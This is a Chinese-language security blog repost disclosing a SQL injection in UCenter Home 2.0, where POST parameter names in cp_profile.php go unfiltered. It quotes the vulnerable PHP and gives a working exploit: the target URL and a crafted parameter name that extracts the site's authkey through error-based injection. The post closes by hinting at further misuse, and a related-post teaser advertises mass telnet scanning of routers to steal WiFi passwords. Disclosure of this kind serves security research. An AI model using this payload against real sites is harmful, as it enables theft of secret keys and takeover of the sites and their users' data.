【漏洞】UCenter Home 2.0 鸡肋SQL注入

admin 2021年4月3日18:53:45评论38 views字数 1230阅读4分6秒阅读模式

    作者:alibaba

    uc_home 2.0 在 magic_quote_gpc off 的环境下只对参数值进行过滤,忽略了参数名。

function_common.php:

//SQL ADDSLASHES
function saddslashes($string) {
    if(is_array($string)) {
        foreach($string as $key => $val) {
            $string[$key] = saddslashes($val); //只过滤参数值
        }
    } else {
        $string = addslashes($string);
    }
    return $string;
}

cp_profile.php 大约 56 行:

//隐私
$inserts = array();
foreach ($_POST['friend'] as $key => $value) {
    $value = intval($value);
    $inserts[] = "('base','$key','$space[uid]','$value')"; //$key 未没过滤
}
if($inserts) {
    $_SGLOBAL['db']->query("DELETE FROM ".tname('spaceinfo')." WHERE uid='$space[uid]' AND type='base'");
    $_SGLOBAL['db']->query("INSERT INTO ".tname('spaceinfo')." (type,subtype,uid,friend)
        VALUES ".implode(',', $inserts)); //这里出现注入漏洞
}

Exploit:

要求: magic_quote_gpc off

URL: cp.php?ac=profile&op=base

保存时创建一个POST,参数名为:
friend[a',(select 1 from(select count(*),concat((Select concat(substring(authkey,1,64)) FROM uc_applications limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a),'1')#]

参数值: 随意

这里我使用火狐的 tamper 实时添加 POST。

得到 uchome 的 authkey。

然后你懂的……

文章来源于lcx.cc:【漏洞】UCenter Home 2.0 鸡肋SQL注入

相关推荐: 批量扫描互联网无线路由设备telnet,并获取WIFI密码

分享一个自己写的telnet获取wifi密码的脚本及WEB 一只猿 (我是猴子派来的彩笔) | 2015-03-14 16:48 比较老的漏洞WooYun: FAST MERCIRY路由器telnet另类入侵 读取WIFI密码通过telnet获取迅捷(FAST…

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2021年4月3日18:53:45
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【漏洞】UCenter Home 2.0 鸡肋SQL注入https://cn-sec.com/archives/319085.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息